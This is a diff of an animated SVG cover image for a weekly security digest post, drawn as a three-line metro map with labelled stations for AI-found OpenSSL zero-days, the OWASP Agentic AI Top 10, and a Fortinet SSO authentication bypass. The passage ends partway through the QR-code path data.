-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Weekly metro map: AI discovers OpenSSL zero-days, OWASP Agentic AI Top 10, Fortinet SSO zero-day">
+<title>AI OpenSSL Zero-Day 12 CVEs, OWASP Agentic AI Top 10, Fortinet CVE-2026-24858</title>
+<!-- profile: high-quality-cover (L21 Metro Map, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1020"/>
+    <stop offset="50%" stop-color="#0C1630"/>
+    <stop offset="100%" stop-color="#0F1A3A"/>
+  </linearGradient>
+  <radialGradient id="pulseRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF4D5E" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#E63946" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFC43D" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#FFA107" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#FFA107" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseCyan" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#5FD3F3" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#2AA8CE" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#2AA8CE" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="30" height="30" patternUnits="userSpaceOnUse">
+    <circle cx="15" cy="15" r="0.7" fill="#2E3A66" opacity="0.55"/>
+  </pattern>
+  <filter id="stationShadow" x="-20%" y="-20%" width="140%" height="140%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.2"/>
+    <feOffset dx="0" dy="2"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.6"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="120%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1"/>
+    <feOffset dx="1" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+<filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%"><feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/><feOffset dx="1" dy="3"/><feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer><feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge></filter></defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgGrad)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Subtle grid guides -->
+<g opacity="0.09" stroke="#4A6AA0" stroke-width="0.6" fill="none">
+  <line x1="0" y1="170" x2="1200" y2="170"/>
+  <line x1="0" y1="330" x2="1200" y2="330"/>
+  <line x1="0" y1="490" x2="1200" y2="490"/>
+  <line x1="200" y1="0" x2="200" y2="630"/>
+  <line x1="400" y1="0" x2="400" y2="630"/>
+  <line x1="620" y1="0" x2="620" y2="630"/>
+  <line x1="850" y1="0" x2="850" y2="630"/>
+  <line x1="1050" y1="0" x2="1050" y2="630"/>
+</g>
+
+<!-- ===== HEADER ===== -->
+<g filter="url(#textShadow)">
+  <text x="60" y="52" font-family="Helvetica, Arial, sans-serif" font-size="27" font-weight="800" fill="#E9EEF8" letter-spacing="1.2">WEEKLY SECURITY DIGEST
+    <animate attributeName="fill" values="#E9EEF8;#8FB8FF;#E9EEF8" dur="6s" repeatCount="indefinite"/>
+  </text>
+  <text x="60" y="78" font-family="Helvetica, Arial, sans-serif" font-size="12.5" font-weight="400" fill="#7A9BC4" letter-spacing="1.8">2026.02.01 — AI DISCOVERS OPENSSL ZERO-DAYS · OWASP AGENTIC AI · FORTINET SSO</text>
+</g>
+
+<!-- Legend top-right -->
+<g transform="translate(940,34)" filter="url(#textShadow)">
+  <rect x="-6" y="-20" width="244" height="62" rx="10" fill="#14213E" stroke="#3A4E82" stroke-width="1.2">
+    <animate attributeName="stroke-opacity" values="0.6;1;0.6" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <!-- CRITICAL -->
+  <circle cx="12" cy="0" r="5" fill="#E63946">
+    <animate attributeName="r" values="5;6.5;5" dur="2s" repeatCount="indefinite"/>
+  </circle>
+  <circle cx="12" cy="0" r="10" fill="url(#pulseRed)" opacity="0.6">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="2s" repeatCount="indefinite"/>
+  </circle>
+  <text x="26" y="5" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">CRITICAL</text>
+  <!-- HIGH -->
+  <circle cx="104" cy="0" r="5" fill="#FFA107">
+    <animate attributeName="r" values="5;6.5;5" dur="2.4s" repeatCount="indefinite"/>
+  </circle>
+  <circle cx="104" cy="0" r="10" fill="url(#pulseAmber)" opacity="0.6">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="2.4s" repeatCount="indefinite"/>
+  </circle>
+  <text x="118" y="5" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">HIGH</text>
+  <!-- INFO -->
+  <circle cx="178" cy="0" r="5" fill="#5FD3F3">
+    <animate attributeName="r" values="5;6.5;5" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle cx="178" cy="0" r="10" fill="url(#pulseCyan)" opacity="0.6">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <text x="192" y="5" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">INFO</text>
+  <text x="-2" y="26" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#5A7AB0">SEVERITY — 3 LINES / 15 STATIONS — 2026.02.01</text>
+</g>
+
+<!-- ==================== LINE 1: AI OpenSSL Zero-Day (RED) ==================== -->
+<!-- L1 badge -->
+<g transform="translate(26,170)">
+  <rect x="-14" y="-16" width="32" height="32" rx="6" fill="#E63946" filter="url(#stationShadow)"/>
+  <text x="2" y="11" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#FFFFFF" text-anchor="middle">L1</text>
+</g>
+<!-- L1 track glow -->
+<line x1="55" y1="170" x2="1145" y2="170" stroke="#E63946" stroke-width="4" stroke-linecap="round" opacity="0.25"/>
+<!-- L1 track main -->
+<line x1="55" y1="170" x2="1145" y2="170" stroke="#E63946" stroke-width="9" stroke-linecap="round" opacity="0.82"/>
+<!-- L1 track shimmer -->
+<line x1="55" y1="170" x2="1145" y2="170" stroke="#FF9AA2" stroke-width="2.5" stroke-linecap="round" opacity="0.45" stroke-dasharray="6 10"/>
+
+<!-- L1 terminus left -->
+<circle cx="70" cy="170" r="12" fill="#0C1630" stroke="#E63946" stroke-width="4"/>
+<circle cx="70" cy="170" r="5" fill="#E63946"/>
+
+<!-- L1 S1: AISLE System -->
+<g filter="url(#stationShadow)">
+  <circle cx="200" cy="170" r="14" fill="#0C1630" stroke="#E63946" stroke-width="3.5"/>
+  <circle cx="200" cy="170" r="7" fill="#FF4D5E"/>
+  <circle cx="200" cy="170" r="12" fill="url(#pulseRed)" opacity="0.7">
+    <animate attributeName="opacity" values="0.4;1;0.4" dur="2s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="200" y="148" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FF7B85" text-anchor="middle">AISLE</text>
+<text x="200" y="134" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C87070" text-anchor="middle">AI System</text>
+
+<!-- L1 S2: OpenSSL Target -->
+<g filter="url(#stationShadow)">
+  <circle cx="400" cy="170" r="14" fill="#0C1630" stroke="#E63946" stroke-width="3.5"/>
+  <circle cx="400" cy="170" r="7" fill="#FF4D5E"/>
+</g>
+<text x="400" y="148" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FF7B85" text-anchor="middle">OPENSSL</text>
+<text x="400" y="134" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C87070" text-anchor="middle">Scan Target</text>
+<text x="400" y="194" font-family="Helvetica, Arial, sans-serif" font-size="9" fill="#7A4040" text-anchor="middle">crypto lib</text>
+
+<!-- L1 S3: 12 CVEs Found (major station) -->
+<g filter="url(#stationShadow)">
+  <circle cx="620" cy="170" r="19" fill="#0C1630" stroke="#E63946" stroke-width="4.5"/>
+  <circle cx="620" cy="170" r="10" fill="#FF4D5E"/>
+  <circle cx="620" cy="170" r="17" fill="url(#pulseRed)" opacity="0.55">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="1.4s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="620" y="144" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="900" fill="#FF4D5E" text-anchor="middle">12 CVEs FOUND</text>
+<text x="620" y="129" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#E63946" text-anchor="middle">HISTORIC MILESTONE</text>
+<text x="620" y="200" font-family="Helvetica, Arial, sans-serif" font-size="9" fill="#7A4040" text-anchor="middle">zero-days discovered</text>
+
+<!-- L1 S4: Patch Deploy -->
+<g filter="url(#stationShadow)">
+  <circle cx="850" cy="170" r="14" fill="#0C1630" stroke="#E63946" stroke-width="3.5"/>
+  <circle cx="850" cy="170" r="7" fill="#FF4D5E"/>
+</g>
+<text x="850" y="148" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FF7B85" text-anchor="middle">PATCH</text>
+<text x="850" y="134" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C87070" text-anchor="middle">Deploy Now</text>
+
+<!-- L1 S5: Verified Secure -->
+<g filter="url(#stationShadow)">
+  <circle cx="1050" cy="170" r="14" fill="#0C1630" stroke="#E63946" stroke-width="3.5"/>
+  <circle cx="1050" cy="170" r="7" fill="#FF4D5E"/>
+</g>
+<text x="1050" y="148" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FF7B85" text-anchor="middle">VERIFIED</text>
+<text x="1050" y="134" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C87070" text-anchor="middle">Secure</text>
+
+<!-- L1 terminus right -->
+<circle cx="1145" cy="170" r="12" fill="#0C1630" stroke="#E63946" stroke-width="4"/>
+<circle cx="1145" cy="170" r="5" fill="#E63946"/>
+
+<!-- L1 animated traveler -->
+<circle cx="70" cy="170" r="7" fill="#FF9AA2" opacity="0.9">
+  <animate attributeName="cx" values="70;200;400;620;850;1050;1145;70" dur="10s" calcMode="spline" keySplines="0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0.9;0.6;0.9" dur="2s" repeatCount="indefinite"/>
+</circle>
+
+<!-- L1 label -->
+<text x="62" y="215" font-family="Helvetica, Arial, sans-serif" font-size="10.5" fill="#E63946" font-weight="700">AI DISCOVERS OPENSSL ZERO-DAYS — AISLE RESEARCH SYSTEM — INFORMATIONAL / STRATEGIC</text>
+
+
+<!-- ==================== LINE 2: OWASP Agentic AI (AMBER) ==================== -->
+<!-- L2 badge -->
+<g transform="translate(26,330)">
+  <rect x="-14" y="-16" width="32" height="32" rx="6" fill="#FFA107" filter="url(#stationShadow)"/>
+  <text x="2" y="11" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#FFFFFF" text-anchor="middle">L2</text>
+</g>
+<!-- L2 track glow -->
+<line x1="55" y1="330" x2="1145" y2="330" stroke="#FFA107" stroke-width="4" stroke-linecap="round" opacity="0.25"/>
+<!-- L2 track main -->
+<line x1="55" y1="330" x2="1145" y2="330" stroke="#FFA107" stroke-width="9" stroke-linecap="round" opacity="0.82"/>
+<!-- L2 track shimmer -->
+<line x1="55" y1="330" x2="1145" y2="330" stroke="#FFD060" stroke-width="2.5" stroke-linecap="round" opacity="0.45" stroke-dasharray="6 10"/>
+
+<!-- L2 terminus left -->
+<circle cx="70" cy="330" r="12" fill="#0C1630" stroke="#FFA107" stroke-width="4"/>
+<circle cx="70" cy="330" r="5" fill="#FFA107"/>
+
+<!-- L2 S1: Agent Threat Surface -->
+<g filter="url(#stationShadow)">
+  <circle cx="200" cy="330" r="14" fill="#0C1630" stroke="#FFA107" stroke-width="3.5"/>
+  <circle cx="200" cy="330" r="7" fill="#FFC43D"/>
+  <circle cx="200" cy="330" r="12" fill="url(#pulseAmber)" opacity="0.7">
+    <animate attributeName="opacity" values="0.4;1;0.4" dur="2.2s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="200" y="354" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FFD060" text-anchor="middle">AGENT THREAT</text>
+<text x="200" y="368" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C8A040" text-anchor="middle">Attack Surface</text>
+
+<!-- L2 S2: OWASP Top 10 Framework (major station) -->
+<g filter="url(#stationShadow)">
+  <circle cx="400" cy="330" r="19" fill="#0C1630" stroke="#FFA107" stroke-width="4.5"/>
+  <circle cx="400" cy="330" r="10" fill="#FFC43D"/>
+  <circle cx="400" cy="330" r="17" fill="url(#pulseAmber)" opacity="0.55">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="1.8s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="400" y="354" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="900" fill="#FFC43D" text-anchor="middle">OWASP TOP 10</text>
+<text x="400" y="368" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C8A040" text-anchor="middle">Agentic AI</text>
+<text x="400" y="305" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#8A7030" text-anchor="middle">official framework</text>
+
+<!-- L2 S3: Prompt Injection -->
+<g filter="url(#stationShadow)">
+  <circle cx="620" cy="330" r="14" fill="#0C1630" stroke="#FFA107" stroke-width="3.5"/>
+  <circle cx="620" cy="330" r="7" fill="#FFC43D"/>
+</g>
+<text x="620" y="354" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FFD060" text-anchor="middle">PROMPT INJ</text>
+<text x="620" y="368" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C8A040" text-anchor="middle">Top Risk #1</text>
+
+<!-- L2 S4: Tool Misuse -->
+<g filter="url(#stationShadow)">
+  <circle cx="850" cy="330" r="14" fill="#0C1630" stroke="#FFA107" stroke-width="3.5"/>
+  <circle cx="850" cy="330" r="7" fill="#FFC43D"/>
+</g>
+<text x="850" y="354" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FFD060" text-anchor="middle">TOOL MISUSE</text>
+<text x="850" y="368" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C8A040" text-anchor="middle">Attack Vector</text>
+
+<!-- L2 S5: Governance / NIST -->
+<g filter="url(#stationShadow)">
+  <circle cx="1050" cy="330" r="14" fill="#0C1630" stroke="#FFA107" stroke-width="3.5"/>
+  <circle cx="1050" cy="330" r="7" fill="#FFC43D"/>
+</g>
+<text x="1050" y="354" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#FFD060" text-anchor="middle">GOVERNANCE</text>
+<text x="1050" y="368" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#C8A040" text-anchor="middle">NIST-based</text>
+
+<!-- L2 terminus right -->
+<circle cx="1145" cy="330" r="12" fill="#0C1630" stroke="#FFA107" stroke-width="4"/>
+<circle cx="1145" cy="330" r="5" fill="#FFA107"/>
+
+<!-- L2 animated traveler -->
+<circle cx="70" cy="330" r="7" fill="#FFD090" opacity="0.9">
+  <animate attributeName="cx" values="70;200;400;620;850;1050;1145;70" dur="12s" calcMode="spline" keySplines="0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0.9;0.6;0.9" dur="2.4s" repeatCount="indefinite"/>
+</circle>
+
+<!-- L2 label -->
+<text x="62" y="395" font-family="Helvetica, Arial, sans-serif" font-size="10.5" fill="#FFA107" font-weight="700">OWASP AGENTIC AI TOP 10 — OFFICIAL FRAMEWORK — HIGH SEVERITY</text>
+
+
+<!-- ==================== LINE 3: Fortinet SSO Zero-Day (CYAN) ==================== -->
+<!-- L3 badge -->
+<g transform="translate(26,490)">
+  <rect x="-14" y="-16" width="32" height="32" rx="6" fill="#2AA8CE" filter="url(#stationShadow)"/>
+  <text x="2" y="11" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#FFFFFF" text-anchor="middle">L3</text>
+</g>
+<!-- L3 track glow -->
+<line x1="55" y1="490" x2="1145" y2="490" stroke="#2AA8CE" stroke-width="4" stroke-linecap="round" opacity="0.25"/>
+<!-- L3 track main -->
+<line x1="55" y1="490" x2="1145" y2="490" stroke="#2AA8CE" stroke-width="9" stroke-linecap="round" opacity="0.82"/>
+<!-- L3 track shimmer -->
+<line x1="55" y1="490" x2="1145" y2="490" stroke="#5FD3F3" stroke-width="2.5" stroke-linecap="round" opacity="0.45" stroke-dasharray="6 10"/>
+
+<!-- L3 terminus left -->
+<circle cx="70" cy="490" r="12" fill="#0C1630" stroke="#2AA8CE" stroke-width="4"/>
+<circle cx="70" cy="490" r="5" fill="#2AA8CE"/>
+
+<!-- L3 S1: CVE-2026-24858 (major station) -->
+<g filter="url(#stationShadow)">
+  <circle cx="200" cy="490" r="19" fill="#0C1630" stroke="#2AA8CE" stroke-width="4.5"/>
+  <circle cx="200" cy="490" r="10" fill="#5FD3F3"/>
+  <circle cx="200" cy="490" r="17" fill="url(#pulseCyan)" opacity="0.55">
+    <animate attributeName="opacity" values="0.3;0.8;0.3" dur="2s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="200" y="514" font-family="Helvetica, Arial, sans-serif" font-size="10.5" font-weight="900" fill="#5FD3F3" text-anchor="middle">CVE-2026-24858</text>
+<text x="200" y="528" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#4AA0C0" text-anchor="middle">Fortinet SSO</text>
+<text x="200" y="465" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#3A7090" text-anchor="middle">in-the-wild</text>
+
+<!-- L3 S2: Auth Bypass -->
+<g filter="url(#stationShadow)">
+  <circle cx="400" cy="490" r="14" fill="#0C1630" stroke="#2AA8CE" stroke-width="3.5"/>
+  <circle cx="400" cy="490" r="7" fill="#5FD3F3"/>
+  <circle cx="400" cy="490" r="12" fill="url(#pulseCyan)" opacity="0.7">
+    <animate attributeName="opacity" values="0.4;1;0.4" dur="2.6s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<text x="400" y="514" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#5FD3F3" text-anchor="middle">AUTH BYPASS</text>
+<text x="400" y="528" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#4AA0C0" text-anchor="middle">FortiCloud SSO</text>
+
+<!-- L3 S3: FortiGate Access -->
+<g filter="url(#stationShadow)">
+  <circle cx="620" cy="490" r="14" fill="#0C1630" stroke="#2AA8CE" stroke-width="3.5"/>
+  <circle cx="620" cy="490" r="7" fill="#5FD3F3"/>
+</g>
+<text x="620" y="514" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#5FD3F3" text-anchor="middle">FORTIGATE</text>
+<text x="620" y="528" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#4AA0C0" text-anchor="middle">Firewall Breach</text>
+
+<!-- L3 S4: Lateral Movement -->
+<g filter="url(#stationShadow)">
+  <circle cx="850" cy="490" r="14" fill="#0C1630" stroke="#2AA8CE" stroke-width="3.5"/>
+  <circle cx="850" cy="490" r="7" fill="#5FD3F3"/>
+</g>
+<text x="850" y="514" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#5FD3F3" text-anchor="middle">LATERAL MOVE</text>
+<text x="850" y="528" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#4AA0C0" text-anchor="middle">Network Pivot</text>
+
+<!-- L3 S5: Patch Critical -->
+<g filter="url(#stationShadow)">
+  <circle cx="1050" cy="490" r="14" fill="#0C1630" stroke="#2AA8CE" stroke-width="3.5"/>
+  <circle cx="1050" cy="490" r="7" fill="#5FD3F3"/>
+</g>
+<text x="1050" y="514" font-family="Helvetica, Arial, sans-serif" font-size="11.5" font-weight="700" fill="#5FD3F3" text-anchor="middle">PATCH NOW</text>
+<text x="1050" y="528" font-family="Helvetica, Arial, sans-serif" font-size="9.5" fill="#4AA0C0" text-anchor="middle">Critical Fix</text>
+
+<!-- L3 terminus right -->
+<circle cx="1145" cy="490" r="12" fill="#0C1630" stroke="#2AA8CE" stroke-width="4"/>
+<circle cx="1145" cy="490" r="5" fill="#2AA8CE"/>
+
+<!-- L3 animated traveler -->
+<circle cx="70" cy="490" r="7" fill="#90E8FF" opacity="0.9">
+  <animate attributeName="cx" values="70;200;400;620;850;1050;1145;70" dur="14s" calcMode="spline" keySplines="0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1;0.4 0 0.6 1" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0.9;0.6;0.9" dur="2.8s" repeatCount="indefinite"/>
+</circle>
+
+<!-- L3 label -->
+<text x="62" y="555" font-family="Helvetica, Arial, sans-serif" font-size="10.5" fill="#2AA8CE" font-weight="700">FORTINET CVE-2026-24858 FORTICLOUD SSO AUTH BYPASS — CRITICAL / IN-THE-WILD</text>
+
+<!-- ===== FOOTER ===== -->
+<rect x="0" y="583" width="1200" height="47" fill="#060E1E" opacity="0.88"/>
+<rect x="0" y="583" width="1200" height="1.5" fill="#1E3060" opacity="0.9"/>
+<text x="60" y="611" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#4A6AA0">tech.2twodragon.com · WEEKLY SECURITY DIGEST · 2026-02-01 · AI / OPENSSL / OWASP / FORTINET</text>
+<text x="1140" y="611" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#4A6AA0" text-anchor="end">L21 Metro Map</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/01/Tech_Security_Weekly_Digest_AI_OpenSSL_Zero_Day_OWASP_Agentic_Fortinet/ : 45x45 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.866667)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM11 0h1v1h-1zM13 0h3v1h-3zM17 0h2v1h-2zM20 0h1v1h-1zM26 0h6v1h-6zM33 0h1v1h-1zM36 0h1v1h-1zM38 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM13 1h2v1h-2zM16 1h3v1h-3zM22 1h3v1h-3zM26 1h1v1h-1zM29 1h1v1h-1zM31 1h3v1h-3zM35 1h1v1h-1zM38 1h1v1h-1zM44 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h7v1h-7zM17 2h1v1h-1zM19 2h2v1h-2zM22 2h3v1h-3zM26 2h1v1h-1zM28 2h1v1h-1zM30 2h2v1h-2zM33 2h1v1h-1zM35 2h1v1h-1zM38 2h1v1h-1zM40 2h3v1h-3zM44 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h1v1h-1zM12 3h2v1h-2zM16 3h1v1h-1zM19 3h3v1h-3zM24 3h2v1h-2zM28 3h1v1h-1zM30 3h2v1h-2zM35 3h2v1h-2zM38 3h1v1h-1zM40 3h3v1h-3zM44 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM11 4h1v1h-1zM15 4h1v1h-1zM20 4h5v1h-5zM26 4h5v1h-5zM33 4h4v1h-4zM38 4h1v1h-1zM40 4h3v1h-3zM44 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h2v1h-2zM12 5h2v1h-2zM15 5h1v1h-1zM17 5h1v1h-1zM19 5h2v1h-2zM24 5h2v1h-2zM27 5h6v1h-6zM38 5h1v1h-1zM44 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h7v1h-7zM8 7h1v1h-1zM10 7h1v1h-1zM14 7h7v1h-7zM24 7h1v1h-1zM27 7h1v1h-1zM30 7h2v1h-2zM34 7h1v1h-1zM0 8h1v1h-1zM4 8h1v1h-1zM6 8h5v1h-5zM14 8h4v1h-4zM20 8h5v1h-5zM26 8h2v1h-2zM29 8h1v1h-1zM32 8h1v1h-1zM35 8h1v1h-1zM37 8h5v1h-5zM44 8h1v1h-1zM0 9h1v1h-1zM3 9h2v1h-2zM9 9h1v1h-1zM14 9h1v1h-1zM18 9h1v1h-1zM21 9h1v1h-1zM24 9h1v1h-1zM26 9h1v1h-1zM28 9h3v1h-3zM32 9h2v1h-2zM35 9h8v1h-8zM0 10h3v1h-3zM6 10h1v1h-1zM9 10h1v1h-1zM16 10h2v1h-2zM19 10h1v1h-1zM22 10h2v1h-2zM26 10h4v1h-4zM32 10h2v1h-2zM37 10h5v1h-5zM43 10h1v1h-1zM1 11h1v1h-1zM3 11h1v1h-1zM9 11h1v1h-1zM12 11h1v1h-1zM14 11h1v1h-1zM16 11h2v1h-2zM22 11h1v1h-1zM24 11h1v1h-1zM27 11h1v1h-1zM30 11h1v1h-1zM32 11h3v1h-3zM40 11h1v1h-1zM0 12h1v1h-1zM2 12h1v1h-1zM4 12h1v1h-1zM6 12h5v1h-5zM12 12h1v1h-1zM14 12h2v1h-2zM17 12h2v1h-2zM20 12h4v1h-4zM27 12h1v1h-1zM29 12h1v1h-1zM31 12h2v1h-2zM35 12h1v1h-1zM37 12h3v1h-3zM41 12h1v1h-1zM43 12h1v1h-1zM1 13h1v1h-1zM3 13h1v1h-1zM5 13h1v1h-1zM7 13h2v1h-2zM11 13h2v1h-2zM15 13h2v1h-2zM19 13h4v1h-4zM26 13h1v1h-1zM29 13h2v1h-2zM32 13h1v1h-1zM36 13h5v1h-5zM43 13h2v1h-2zM0 14h1v1h-1zM2 14h1v1h-1zM6 14h1v1h-1zM9 14h1v1h-1zM12 14h2v1h-2zM16 14h1v1h-1zM21 14h1v1h-1zM26 14h1v1h-1zM28 14h2v1h-2zM36 14h5v1h-5zM42 14h2v1h-2zM0 15h5v1h-5zM8 15h2v1h-2zM13 15h2v1h-2zM18 15h2v1h-2zM23 15h2v1h-2zM28 15h1v1h-1zM31 15h4v1h-4zM36 15h2v1h-2zM39 15h2v1h-2zM43 15h2v1h-2zM1 16h1v1h-1zM5 16h2v1h-2zM8 16h1v1h-1zM11 16h3v1h-3zM15 16h4v1h-4zM27 16h1v1h-1zM30 16h6v1h-6zM37 16h3v1h-3zM0 17h1v1h-1zM2 17h1v1h-1zM4 17h2v1h-2zM12 17h3v1h-3zM16 17h1v1h-1zM23 17h1v1h-1zM26 17h1v1h-1zM28 17h4v1h-4zM33 17h1v1h-1zM35 17h2v1h-2zM38 17h4v1h-4zM43 17h1v1h-1zM0 18h1v1h-1zM2 18h2v1h-2zM5 18h3v1h-3zM9 18h1v1h-1zM11 18h1v1h-1zM13 18h2v1h-2zM16 18h2v1h-2zM19 18h1v1h-1zM30 18h3v1h-3zM36 18h1v1h-1zM38 18h1v1h-1zM42 18h2v1h-2zM1 19h2v1h-2zM4 19h1v1h-1zM8 19h1v1h-1zM10 19h2v1h-2zM13 19h3v1h-3zM19 19h1v1h-1zM22 19h1v1h-1zM25 19h2v1h-2zM28 19h1v1h-1zM32 19h1v1h-1zM34 19h1v1h-1zM36 19h1v1h-1zM43 19h1v1h-1zM1 20h2v1h-2zM4 20h7v1h-7zM12 